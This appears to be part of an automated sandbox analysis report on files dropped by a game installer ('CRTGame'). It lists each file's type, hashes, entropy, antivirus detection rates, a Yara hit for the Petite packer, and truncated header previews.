                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):11532
                                                                                          Entropy (8bit):7.219753259626605
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:Dqv1jf+0vAe7Dl+JTGxuK5Rbfh70Il9MWbzq6UWkE0FGemexbiJi8TK0Q2:m9KIAeNgTGxu2Jfh1DMSzqKkvFGLJi85
                                                                                          MD5:073F34B193F0831B3DD86313D74F1D2A
                                                                                          SHA1:3DF5592532619C5D9B93B04AC8DBCEC062C6DD09
                                                                                          SHA-256:C5EEC9CD18A344227374F2BC1A0D2CE2F1797CFFD404A0A28CF85439D15941E9
                                                                                          SHA-512:EEFD583D1F213E5A5607C2CFBAED39E07AEC270B184E61A1BA0B5EF67ED7AC5518B5C77345CA9BD4F39D2C86FCD261021568ED14945E7A7541ADF78E18E64B0C
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L.....V...........!.........(...............P............................................@.........................P...........d....p..8...................82.........................................................8....................................`.......$..................@..@.rsrc........p.......&..............@..@.......................................@petite...............*..............`..`....................................#..L....y......"......O/..M...C.A.&:.e.i..l....CP...g.AK..S;.lf.?.g....].k.U.G.Y.J.",......%....:ge.D x.P }}..Tih.g......%G.Iy.j...\..*.S...s..$..........o..y..........,.........-..X.....v.M1..*'...5R.4..8k!..q.=*BVST<..M.E.._T.p...K.r....C.HEO....\..%%,I....>'.L.ct..{..I..l.Y#f Tk*...:bH?.....G..Y.p..Q.....z/R.h>8....]S.....p.c/.m..6tc.d..(..{...=w4.w.^..d.....^..Tp.....Z.*.).Z."...&.-...o...xD+0.L+!...X.%?)+.P..Z.......P..F..P.".._.%9.^T;(..Y.>.. .....re
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):39304
                                                                                          Entropy (8bit):7.819409739152795
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:i5GGx+OZPWuGdoiwUpPLH7IN3x1eW0kIAJbfT13MMnahRlmftuohQf:i5DxDPWMApPLsNhkVkI6R3TnalauoQ
                                                                                          MD5:C7A50ACE28DDE05B897E000FA398BBCE
                                                                                          SHA1:33DA507B06614F890D8C8239E71D3D1372E61DAA
                                                                                          SHA-256:F02979610F9BE2F267AA3260BB3DF0F79EEEB6F491A77EBBE719A44814602BCC
                                                                                          SHA-512:4CD7F851C7778C99AFED492A040597356F1596BD81548C803C45565975CA6F075D61BC497FCE68C6B4FEDC1D0B5FD0D84FEAA187DC5E149F4E8E44492D999358
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....."b...........!.........x.......P.......................................`.......Z....@.........................PR.......Q..d....0..0............}......D........................................................Q..8.................................... .......t..................@..@.rsrc.... ...0.......v..............@..@petite.......P.......z..............`..`......................p..k..K..i{..\.H..'.|w.t...\..dkB%..i.cX...`*B...m.X..A.NU.i.I. J.I....x-.e2n.IA.2.:..2G5Z/.+(8w.S<...`ML........!..%+.r.s.1.~.D...]......U..q3.....9..?y.>j.E.T...Y..D..>..aJ......P^Y..w?.9w.,...+C^.[....|..'.....7..F%..A.....)..b.)8.2Q`.v.F=.."S*..{z...z-H=....L_....RM..s......H2P1a....[..i. 2..~.?...+R... .m(.I..X...H.g.Z..i..G.?.(......e.:.B......fh......gl.x.Z......I>..#....Hgv.;g.@ l.$(...0.........l.>.p..z;A.@...*4v..x.U.gU..Bqqb..6.x...D.....cIE(5m.g}J..
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):18966
                                                                                          Entropy (8bit):7.620111275837424
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                                          MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                                          SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                                          SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                                          SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):8456
                                                                                          Entropy (8bit):6.767152008521429
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
                                                                                          MD5:19E08B7F7B379A9D1F370E2B5CC622BD
                                                                                          SHA1:3E2D2767459A92B557380C5796190DB15EC8A6EA
                                                                                          SHA-256:AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
                                                                                          SHA-512:564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':*;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..*L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...|.
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):36752
                                                                                          Entropy (8bit):7.780431937344781
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:E7epCl6I8YbTvEKXQ2vm+iocmmMt7KjuDnlVahRlmftuY5B:EepUv8aZvmd+7nDDalauy
                                                                                          MD5:9FF783BB73F8868FA6599CDE65ED21D7
                                                                                          SHA1:F515F91D62D36DC64ADAA06FA0EF6CF769376BDF
                                                                                          SHA-256:E0234AF5F71592C472439536E710BA8105D62DFA68722965DF87FED50BAB1816
                                                                                          SHA-512:C9D3C3502601026B6D55A91C583E0BB607BFC695409B984C0561D0CBE7D4F8BD231BC614E0EC1621C287BF0F207017D3E041694320E692FF00BC2220BFA26C26
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):36416
                                                                                          Entropy (8bit):7.842278356440954
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:lshkyPXvH6bPACtmb8boNQdVfCXewki/OvXEApOqmFfSq1oIQMW:lsh3n5Pb8boOdVCuwNEXEAonfSq1JQb
                                                                                          MD5:BEBA64522AA8265751187E38D1FC0653
                                                                                          SHA1:63FFB566AA7B2242FCC91A67E0EDA940C4596E8E
                                                                                          SHA-256:8C58BC6C89772D0CD72C61E6CF982A3F51DEE9AAC946E076A0273CD3AAF3BE9D
                                                                                          SHA-512:13214E191C6D94DB914835577C048ADF2240C7335C0A2C2274C096114B7B75CD2CE13A76316963CCD55EE371631998FAC678FCF82AE2AE178B7813B2C35C6651
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):19008
                                                                                          Entropy (8bit):7.672481244971812
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                                          MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                                          SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                                          SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                                          SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):68876
                                                                                          Entropy (8bit):7.922125376804506
                                                                                          Encrypted:false
                                                                                          SSDEEP:1536:q0Z4sz1ZMjCjDIhoLffiedENahBzzxO/JfgmYFGKEvi8TxCI+vHVl:v4MzMjGkhoLfsahS/JYN2vUl
                                                                                          MD5:4E35BA785CD3B37A3702E577510F39E3
                                                                                          SHA1:A2FD74A68BEFF732E5F3CB0835713AEA8D639902
                                                                                          SHA-256:0AFE688B6FCA94C69780F454BE65E12D616C6E6376E80C5B3835E3FA6DE3EB8A
                                                                                          SHA-512:1B839AF5B4049A20D9B8A0779FE943A4238C8FBFBF306BC6D3A27AF45C76F6C56B57B2EC8F087F7034D89B5B139E53A626A8D7316BE1374EAC28B06D23E7995D
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):17472
                                                                                          Entropy (8bit):7.524548435291935
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
                                                                                          MD5:7B52BE6D702AA590DB57A0E135F81C45
                                                                                          SHA1:518FB84C77E547DD73C335D2090A35537111F837
                                                                                          SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
                                                                                          SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):35588
                                                                                          Entropy (8bit):7.817557274117395
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                                          MD5:58521D1AC2C588B85642354F6C0C7812
                                                                                          SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                                          SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                                          SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:Unicode text, UTF-8 text
                                                                                          Category:dropped
                                                                                          Size (bytes):1059
                                                                                          Entropy (8bit):5.1208137218866945
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                                          MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                                          SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                                          SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                                          SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                                          Malicious:false
                                                                                           Preview:Copyright (c) 2011 Jan Kokemüller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):16910
                                                                                          Entropy (8bit):5.289608933932413
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                                          MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                                          SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                                          SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                                          SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):15374
                                                                                          Entropy (8bit):5.192037544202194
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                                          MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                                          SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                                          SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                                          SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):197646
                                                                                          Entropy (8bit):6.1570532273946625
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                                          MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                                          SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                                          SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                                          SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):31936
                                                                                          Entropy (8bit):6.6461204214578
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                                          MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                                          SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                                          SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                                          SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):197120
                                                                                          Entropy (8bit):6.423554884287906
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                                          MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                                          SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                                          SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                                          SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):115712
                                                                                          Entropy (8bit):6.401537154757194
                                                                                          Encrypted:false
                                                                                          SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                                          MD5:840D631DA54C308B23590AD6366EBA77
                                                                                          SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                                          SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                                          SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):62478
                                                                                          Entropy (8bit):6.063363187934607
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                                          MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                                          SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                                          SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                                          SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):26126
                                                                                          Entropy (8bit):6.048294343792499
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                                          MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                                          SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                                          SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                                          SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):8456
                                                                                          Entropy (8bit):6.767152008521429
                                                                                          Encrypted:false
                                                                                          SSDEEP:192:yxPHUtfhriUVoSoGtyo2xmJ8GbarAtT7/lxjFZnPK0cl:KPehriU3t2IiGbHTxZnPK0cl
                                                                                          MD5:19E08B7F7B379A9D1F370E2B5CC622BD
                                                                                          SHA1:3E2D2767459A92B557380C5796190DB15EC8A6EA
                                                                                          SHA-256:AC97E5492A3CE1689A2B3C25D588FAC68DFF5C2B79FCF4067F2D781F092BA2A1
                                                                                          SHA-512:564101A9428A053AA5B08E84586BCBB73874131154010A601FCE8A6FC8C4850C614B4B0A07ACF2A38FD2D4924D835584DB0A8B49EF369E2E450E458AC32CF256
                                                                                          Malicious:false
                                                                                          Yara Hits:
                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-0NR14.tmp, Author: Joe Security
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...................................D.... ..PE..L...#.MZ...........!.................p.......0............................................@.........................Pr.......q..d....P..8....................%.......................................................q..8....................................@..........................@..@.rsrc........P......................@..@.............`.........................@petite.......p......................`..`..................................................l..a.......1...3W..Z.....H...5.(...$.. .>X9..Fn... ..."j1..........%.7.d...".m...n.ePY......`....I.gYo..UC....Rq(...F......s..8`.I.....i..F.....'......@..-;.........J...Oq...b@...........$.D4E..($.....8':*;.q....[-..{..w....@M....J$..0d..9Q.I^.^y.E..*L_-.x!s.......W.H.R..@.6....MQ.Q8.s.."...!."IX.vM...!e.$%......U.....F.CoI..X.dA...0.Y..r.8.*p...<..M y...8..s....N5<.J....&..`...w..'..\s..%..A.`....s..j.H...X#..R.\..)R3@..X.P.5...G..t.f/..C.b.d...|.
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):337408
                                                                                          Entropy (8bit):6.515131904432587
                                                                                          Encrypted:false
                                                                                          SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                                          MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                                          SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                                          SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                                          SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                                          Malicious:false
                                                                                          Antivirus:
                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
